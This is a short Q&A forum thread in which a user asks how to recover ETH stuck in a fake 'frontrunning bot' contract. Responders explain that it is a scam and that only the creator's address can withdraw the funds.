This is the same issue as below:

How to retrieve ETH accidentally sent to a contract that is watch only

Funds are still there but get this:

Gas estimation errored with the following message (see below). The transaction execution will likely fail. Do you want to force sending? execution reverted: WARNING: not enough ETH for profitable frontrunning. Need at least 1 ETH at present market conditions. Cannot withdraw during an active trade, try again in about an hour...

I've also reported it.

Any way of getting the funds back?

I would like to know. if they can call withdrawal or start why can't I?

  • There's no such thing as standalone front running smart contracts.

  • thanks for the repliy. the eth is still stuck in the contract is there no way to get it back?

  • Unfortunately it is not possible. The creator's address is the only one authorized for withdrawals.

You fell for a scam. The contract you deployed doesn't do any frontrunning, botting, or whatever.

  • @ariaga2 The ETH will eventually be drained by the scammer, only his address can do it. Note: I have not thoroughly analyzed the contract but that's how it usually goes.
